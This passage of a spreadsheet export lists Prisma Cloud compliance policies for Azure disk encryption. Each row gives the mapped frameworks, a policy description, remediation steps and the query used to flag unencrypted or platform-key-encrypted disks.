          <t>HIPAA, CSA CCM v.4.0.1, CSA CCM v4.0.12, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, GDPR, APRA (CPS 234) Information Security, NIST SP 800-172, ISO/IEC 27001:2022, CIS Controls v8, CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, MLPS 2.0 (Level 2), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST CSF v.11.2.0, Fedramp (Moderate), RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, MTSBv2_Azure, CIS v2.1.0 (Azure) Level 2, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS v1.3.1 (Azure), CDC NIST 800-53 Rev4, CIS v1.2.0 (Azure), Copy of New Zealand Information Security Manual (NZISM v3.4), Copy of CIS Controls v8, PCI DSS v4.0, NIST 800-53 Rev 5, NIST 800-53 Rev4, HITRUST v.9.4.2 [Deprecated], CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, GDPR, Copy of CIS v1.2.0 (Azure), Microsoft Cloud Security Benchmark v1, CIS v1.5.0 (Azure) - Level 2, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), PCI DSS v4.0, Telecommunications Security Act - TSA, ISO/IEC 27018:2019, CyberSecurity Law of the People's Republic of China, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Copy of Azure Security Benchmark (v3), ISO/IEC 27017:2015, Azure Security Benchmark (v3), PCI DSS v4.0, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CSA CCM v.4.0.1, NIST 800-53 Rev 5, CIS v2.0.0 (Azure) Level 2, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), CIS v1.1 (Azure), testazure, PCI DSS v4.0, APRA (CPS 234) Information Security, NIST CSF, TX-RAMP Level 1, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), CIS v1.4.0 (Azure), PCI DSS v4.0, CIS v1.3.0 (Azure), HIPAA, ISO/IEC 27002:2013, PCI DSS v4.0, ISO/IEC 27002:2013, Azure Security Benchmark (v3), NYDFS 23 CRR-NY 500.0, New Zealand Information Security Manual (NZISM v3.4), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2024.2, CyberSecurity Law of the People's Republic of China, Azure Security Benchmark (v2), PCI DSS v4.0, NIST SP 800-171 Revision 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v3.2.1, NIST 800-53 Rev4, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B2257" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2257" s="2" t="inlineStr"/>
      <c r="D2257" t="inlineStr"/>
      <c r="E2257" t="inlineStr"/>
      <c r="F2257" t="inlineStr"/>
      <c r="G2257" t="b">
        <v>0</v>
      </c>
      <c r="H22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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2257" t="inlineStr">
        <is>
          <t>azure-disk-list</t>
        </is>
      </c>
      <c r="K2257" t="inlineStr">
        <is>
          <t>Azure disk is unattached and is encrypted with the default encryption key instead of ADE/CMK</t>
        </is>
      </c>
      <c r="L2257" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2257" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2257" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2257" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2257" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2257" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2257" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S2257" t="inlineStr"/>
      <c r="T2257" t="b">
        <v>0</v>
      </c>
      <c r="U2257" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2257" t="inlineStr">
        <is>
          <t>azure-disk-list</t>
        </is>
      </c>
      <c r="W2257" t="inlineStr">
        <is>
          <t>This policy identifies the disks which are unattached and are encrypted with default encryption instead of ADE/CMK. Azure encrypts disks by default Server-Side Encryption (SSE) with platform-managed keys [SSE with PMK]. It is recommended to use either SSE with Azure Disk Encryption [SSE with PMK+ADE] or Customer Managed Key [SSE with CMK] which improves on platform-managed keys by giving you control of the encryption keys to meet your compliance need.</t>
        </is>
      </c>
      <c r="X2257" t="inlineStr">
        <is>
          <t>If data stored in the disk is no longer useful, refer to Azure documentation to delete unattached data disks at:
API: https://docs.microsoft.com/en-us/rest/api/compute/disks/delete
CLI: https://docs.microsoft.com/en-us/cli/azure/disk?view=azure-cli-latest#az-disk-delete
If data stored in the disk is important, To enable SSE with Azure Disk Encryption [SSE with PMK+ADE] disk needs to be attached to VM.
Follow https://docs.microsoft.com/en-us/azure/security/azure-security-disk-encryption-prerequisites based VM the data disk is assigned. Once encryption is done, Un-attach the disk form the VM using azure portal / CLI.
To enable SSE with Customer Managed Key [SSE with CMK],
Follow https://docs.microsoft.com/en-us/azure/virtual-machines/disks-enable-customer-managed-keys-portal?toc=/azure/virtual-machines/linux/toc.json&amp;bc=/azure/virtual-machines/linux/breadcrumb/toc.json#enable-on-an-existing-disk</t>
        </is>
      </c>
      <c r="Y2257" t="inlineStr"/>
      <c r="Z2257" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-disk-list' AND json.rule = '(managedBy does not exist or managedBy is empty) and (encryptionSettings does not exist or encryptionSettings.enabled is false) and encryption.type is not member of ("EncryptionAtRestWithCustomerKey", "EncryptionAtRestWithPlatformAndCustomerKeys")'</t>
        </is>
      </c>
      <c r="AA2257" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2257" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2257" t="inlineStr">
        <is>
          <t>PC-AZR-CMP-483</t>
        </is>
      </c>
      <c r="AD2257" t="b">
        <v>1</v>
      </c>
      <c r="AE2257" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2257" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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7" t="inlineStr">
        <is>
          <t>a1f899e5-0ff9-4883-a121-75c68cab532a</t>
        </is>
      </c>
      <c r="AI2257" t="inlineStr">
        <is>
          <t>c94f7377-6b09-4c30-8d10-f06775f79928</t>
        </is>
      </c>
      <c r="AJ2257" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2257" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2258">
      <c r="A2258" t="inlineStr">
        <is>
          <t>HIPAA, ISO/IEC 27001:2022, CIS Controls v8.1, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, Secure Controls Framework (SCF) - 2022.2.1, MLPS 2.0 (Level 2), DORA, Microsoft Cloud Security Benchmark v1, Sarbanes Oxley Act (SOX), SOC 2, HIPAA, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2258" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2258" s="2" t="inlineStr"/>
      <c r="D2258" t="inlineStr"/>
      <c r="E2258" t="inlineStr"/>
      <c r="F2258" t="inlineStr"/>
      <c r="G2258" t="b">
        <v>1</v>
      </c>
      <c r="H22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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2258" t="inlineStr">
        <is>
          <t>azure-disk-list</t>
        </is>
      </c>
      <c r="K2258" t="inlineStr">
        <is>
          <t>Azure VM OS disk is not configured with any encryption</t>
        </is>
      </c>
      <c r="L2258" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2258" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2258" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2258" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2258" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2258" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2258" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2258" t="inlineStr"/>
      <c r="T2258" t="b">
        <v>0</v>
      </c>
      <c r="U2258" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2258" t="inlineStr">
        <is>
          <t>azure-disk-list</t>
        </is>
      </c>
      <c r="W2258" t="inlineStr">
        <is>
          <t>This policy identifies VM OS disks that are not configured with any encryption. Azure encrypts OS disks that are not configured with any encryption. Azure offers Server-Side Encryption (SSE) with platform-managed keys [SSE with PMK] by default for managed disks. It is recommended to enable default encryption or you may optionally choose to use a customer-managed key to protect from malicious activity.</t>
        </is>
      </c>
      <c r="X2258" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal
2. Navigate to 'Disks'
3. Select the reported OS disk you want to modify
4. Select 'Encryption' under 'Settings'
5. Select 'Encryption Type' according to your encryption requirement.
6. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2258" t="inlineStr"/>
      <c r="Z2258" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-disk-list' and json.rule = osType exists and managedBy exists and (encryptionSettings does not exist or encryptionSettings.enabled is false) and encryption.type is not member of ("EncryptionAtRestWithCustomerKey","EncryptionAtRestWithPlatformAndCustomerKeys","EncryptionAtRestWithPlatformKey")</t>
        </is>
      </c>
      <c r="AA2258" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2258" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2258" t="inlineStr">
        <is>
          <t>PC-AZR-CMP-942</t>
        </is>
      </c>
      <c r="AD2258" t="b">
        <v>1</v>
      </c>
      <c r="AE2258" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2258" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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8" t="inlineStr">
        <is>
          <t>31121be7-b273-49a1-befe-53a3bd0cd801</t>
        </is>
      </c>
      <c r="AI2258" t="inlineStr">
        <is>
          <t>5e1188c4-9fc5-493c-b03c-17d6ee984ba9</t>
        </is>
      </c>
      <c r="AJ2258" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2258" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2259">
      <c r="A2259" t="inlineStr">
        <is>
          <t>HIPAA, ISO/IEC 27001:2022, CIS Controls v8.1, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, Secure Controls Framework (SCF) - 2022.2.1, MLPS 2.0 (Level 2), DORA, Microsoft Cloud Security Benchmark v1, Sarbanes Oxley Act (SOX), SOC 2, HIPAA, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2259" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2259" s="2" t="inlineStr"/>
      <c r="D2259" t="inlineStr"/>
      <c r="E2259" t="inlineStr"/>
      <c r="F2259" t="inlineStr"/>
      <c r="G2259" t="b">
        <v>1</v>
      </c>
      <c r="H22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59" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2259" t="inlineStr">
        <is>
          <t>azure-disk-list</t>
        </is>
      </c>
      <c r="K2259" t="inlineStr">
        <is>
          <t>Azure VM data disk is not configured with any encryption</t>
        </is>
      </c>
      <c r="L2259" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2259" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2259" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2259" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2259" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2259" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2259" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2259" t="inlineStr"/>
      <c r="T2259" t="b">
        <v>0</v>
      </c>
      <c r="U2259" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2259" t="inlineStr">
        <is>
          <t>azure-disk-list</t>
        </is>
      </c>
      <c r="W2259" t="inlineStr">
        <is>
          <t>This policy identifies VM data disks that are not configured with any encryption. Azure encrypts data disks that are not configured with any encryption. Azure offers Server-Side Encryption (SSE) with platform-managed keys [SSE with PMK] by default for managed disks. It is recommended to enable default encryption or you may optionally choose to use a customer-managed key to protect from malicious activity.</t>
        </is>
      </c>
      <c r="X2259" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal
2. Navigate to 'Disks'
3. Select the reported OS disk you want to modify
4. Select 'Encryption' under 'Settings'
5. Select 'Encryption Type' according to your encryption requirement.
6. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2259" t="inlineStr"/>
      <c r="Z2259" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-disk-list' AND json.rule = osType does not exist and managedBy exists and (encryptionSettings does not exist or encryptionSettings.enabled is false) and encryption.type is not member of ("EncryptionAtRestWithCustomerKey", "EncryptionAtRestWithPlatformAndCustomerKeys","EncryptionAtRestWithPlatformKey")</t>
        </is>
      </c>
      <c r="AA2259" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2259" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2259" t="inlineStr">
        <is>
          <t>PC-AZR-CMP-943</t>
        </is>
      </c>
      <c r="AD2259" t="b">
        <v>1</v>
      </c>
      <c r="AE2259" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2259" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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59" t="inlineStr">
        <is>
          <t>b3a1230c-4a9f-4493-bfe4-c388a2e775d4</t>
        </is>
      </c>
      <c r="AI2259" t="inlineStr">
        <is>
          <t>7429c748-6df8-4f6f-8231-8718ce02477b</t>
        </is>
      </c>
      <c r="AJ2259" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2259" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2260">
      <c r="A2260" t="inlineStr">
        <is>
          <t>HIPAA, CIS v1.2.0 (Azure), Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v.4.0.1, CSA CCM v4.0.12, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Copy of CIS v1.2.0 (Azure), GDPR, APRA (CPS 234) Information Security, NIST SP 800-172, FFIEC, ISO/IEC 27001:2022, CIS Controls v8, CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS v1.5.0 (Azure) - Level 2, APRA (CPS 234) Information Security, CIS v1.1 (Azure), ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, MLPS 2.0 (Level 2), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), FFIEC, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, NIST 800-53 Rev4, CIS v1.4.0 (Azure), Fedramp (Moderate), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Copy of New Zealand Information Security Manual (NZISM v3.4), Copy of CIS Controls v8, PCI DSS v4.0, NIST 800-53 Rev 5, FFIEC, NIST 800-53 Rev4, HITRUST v.9.4.2 [Deprecated], CIS v1.3.1 (Azure), CyberSecurity Law of the People's Republic of China, CIS v2.0.0 (Azure) Level 2, ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, GDPR, Microsoft Cloud Security Benchmark v1, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), PCI DSS v4.0, testazure, Telecommunications Security Act - TSA, ISO/IEC 27018:2019, CyberSecurity Law of the People's Republic of China, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MTSBv2_Azure, Copy of Azure Security Benchmark (v3), ISO/IEC 27017:2015, Azure Security Benchmark (v3), PCI DSS v4.0, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CIS v1.3.0 (Azure), CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, APRA (CPS 234) Information Security, NIST CSF, TX-RAMP Level 1, NIST 800-53 Rev 5, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), PCI DSS v4.0, CDC NIST 800-53 Rev4, HIPAA, CIS v2.1.0 (Azure) Level 2, ISO/IEC 27002:2013, PCI DSS v4.0, ISO/IEC 27002:2013, Azure Security Benchmark (v3), NYDFS 23 CRR-NY 500.0, New Zealand Information Security Manual (NZISM v3.4), APRA (CPS 234) Information Security, CCPA 2018, PIPEDA, ISO/IEC 27002:2013, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2024.2, CyberSecurity Law of the People's Republic of China, Azure Security Benchmark (v2), PCI DSS v4.0, NIST SP 800-171 Revision 2, PCI DSS v3.2.1, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B2260" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2260" s="2" t="inlineStr"/>
      <c r="D2260" t="inlineStr"/>
      <c r="E2260" t="inlineStr"/>
      <c r="F2260" t="inlineStr"/>
      <c r="G2260" t="b">
        <v>0</v>
      </c>
      <c r="H22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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2260" t="inlineStr">
        <is>
          <t>azure-disk-list</t>
        </is>
      </c>
      <c r="K2260" t="inlineStr">
        <is>
          <t>Azure VM OS disk is encrypted with the default encryption key instead of ADE/CMK</t>
        </is>
      </c>
      <c r="L2260" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2260" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2260" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2260" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2260" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2260" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2260" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S2260" t="inlineStr"/>
      <c r="T2260" t="b">
        <v>0</v>
      </c>
      <c r="U2260" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2260" t="inlineStr">
        <is>
          <t>azure-disk-list</t>
        </is>
      </c>
      <c r="W2260" t="inlineStr">
        <is>
          <t>This policy identifies the OS disks which are encrypted with the default encryption key instead of ADE/CMK. Azure encrypts OS disks by default Server-Side Encryption (SSE) with platform-managed keys [SSE with PMK]. It is recommended to use either SSE with Azure Disk Encryption [SSE with PMK+ADE] or Customer Managed Key [SSE with CMK] which improves on platform-managed keys by giving you control of the encryption keys to meet your compliance need.</t>
        </is>
      </c>
      <c r="X2260" t="inlineStr">
        <is>
          <t>To enable SSE with Azure Disk Encryption [SSE with PMK+ADE],
Follow https://docs.microsoft.com/en-us/azure/security/azure-security-disk-encryption-prerequisites based VM the data disk is assigned.
To enable SSE with Customer Managed Key [SSE with CMK],
Follow https://docs.microsoft.com/en-us/azure/virtual-machines/disks-enable-customer-managed-keys-portal</t>
        </is>
      </c>
      <c r="Y2260" t="inlineStr"/>
      <c r="Z2260" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-disk-list' and json.rule = 'osType exists and managedBy exists and (encryptionSettings does not exist or encryptionSettings.enabled == false) and encryption.type is not member of ("EncryptionAtRestWithCustomerKey", "EncryptionAtRestWithPlatformAndCustomerKeys")'</t>
        </is>
      </c>
      <c r="AA2260" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2260" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2260" t="inlineStr">
        <is>
          <t>PC-AZR-CMP-324</t>
        </is>
      </c>
      <c r="AD2260" t="b">
        <v>1</v>
      </c>
      <c r="AE2260" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2260" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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0" t="inlineStr">
        <is>
          <t>bfb072a7-f602-47ad-89ac-a3eb61d3427e</t>
        </is>
      </c>
      <c r="AI2260" t="inlineStr">
        <is>
          <t>c151fa4a-419f-4366-b165-b60d0e96a424</t>
        </is>
      </c>
      <c r="AJ2260" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2260" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2261">
      <c r="A2261" t="inlineStr">
        <is>
          <t>HIPAA, CIS v1.2.0 (Azure), CSA CCM v.4.0.1, CSA CCM v4.0.12, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Copy of CIS v1.2.0 (Azure), GDPR, APRA (CPS 234) Information Security, NIST SP 800-172, FFIEC, ISO/IEC 27001:2022, CIS Controls v8, CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS v1.5.0 (Azure) - Level 2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, MLPS 2.0 (Level 2), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), FFIEC, HITRUST CSF v.11.2.0, Fedramp (Moderate), RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, CIS v1.4.0 (Azure), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CDC NIST 800-53 Rev4, Copy of New Zealand Information Security Manual (NZISM v3.4), Copy of CIS Controls v8, PCI DSS v4.0, NIST 800-53 Rev 5, FFIEC, NIST 800-53 Rev4, CIS v1.3.1 (Azure), CyberSecurity Law of the People's Republic of China, CIS v2.0.0 (Azure) Level 2, ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, Microsoft Cloud Security Benchmark v1, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), PCI DSS v4.0, PCI DSS v3.2.1, Telecommunications Security Act - TSA, CIS v1.1 (Azure), ISO/IEC 27018:2019, CyberSecurity Law of the People's Republic of China, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MTSBv2_Azure, Copy of Azure Security Benchmark (v3), ISO/IEC 27017:2015, Azure Security Benchmark (v3), PCI DSS v4.0, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CIS v1.3.0 (Azure), testazure, CSA CCM v.4.0.1, NIST 800-53 Rev 5, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), BHN bishvesh, PCI DSS v4.0, APRA (CPS 234) Information Security, NIST CSF, TX-RAMP Level 1, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), HITRUST v.9.4.2 [Deprecated], PCI DSS v4.0, HIPAA, CIS v2.1.0 (Azure) Level 2, ISO/IEC 27002:2013, PCI DSS v4.0, ISO/IEC 27002:2013, Azure Security Benchmark (v3), NYDFS 23 CRR-NY 500.0, New Zealand Information Security Manual (NZISM v3.4), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2024.2, CyberSecurity Law of the People's Republic of China, Azure Security Benchmark (v2), PCI DSS v4.0, NIST SP 800-171 Revision 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST 800-53 Rev4, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B2261" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2261" s="2" t="inlineStr"/>
      <c r="D2261" t="inlineStr"/>
      <c r="E2261" t="inlineStr"/>
      <c r="F2261" t="inlineStr"/>
      <c r="G2261" t="b">
        <v>0</v>
      </c>
      <c r="H22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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2261" t="inlineStr">
        <is>
          <t>azure-disk-list</t>
        </is>
      </c>
      <c r="K2261" t="inlineStr">
        <is>
          <t>Azure VM data disk is encrypted with the default encryption key instead of ADE/CMK</t>
        </is>
      </c>
      <c r="L2261" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2261" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2261" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2261" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2261" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2261" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2261" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S2261" t="inlineStr"/>
      <c r="T2261" t="b">
        <v>0</v>
      </c>
      <c r="U2261" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2261" t="inlineStr">
        <is>
          <t>azure-disk-list</t>
        </is>
      </c>
      <c r="W2261" t="inlineStr">
        <is>
          <t>This policy identifies the data disks which are encrypted with the default encryption key instead of ADE/CMK. Azure encrypts data disks by default Server-Side Encryption (SSE) with platform-managed keys [SSE with PMK]. It is recommended to use either SSE with Azure Disk Encryption [SSE with PMK+ADE] or Customer Managed Key [SSE with CMK] which improves on platform-managed keys by giving you control of the encryption keys to meet your compliance need.</t>
        </is>
      </c>
      <c r="X2261" t="inlineStr">
        <is>
          <t>To enable SSE with Azure Disk Encryption [SSE with PMK+ADE],
Follow https://docs.microsoft.com/en-us/azure/security/azure-security-disk-encryption-prerequisites based VM the data disk is assigned.
To enable SSE with Customer Managed Key [SSE with CMK],
Follow https://docs.microsoft.com/en-us/azure/virtual-machines/disks-enable-customer-managed-keys-portal</t>
        </is>
      </c>
      <c r="Y2261" t="inlineStr"/>
      <c r="Z2261" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-disk-list' AND json.rule = 'osType does not exist and managedBy exists and (encryptionSettings does not exist or encryptionSettings.enabled is false) and encryption.type is not member of ("EncryptionAtRestWithCustomerKey", "EncryptionAtRestWithPlatformAndCustomerKeys")'</t>
        </is>
      </c>
      <c r="AA2261" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2261" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2261" t="inlineStr">
        <is>
          <t>PC-AZR-CMP-435</t>
        </is>
      </c>
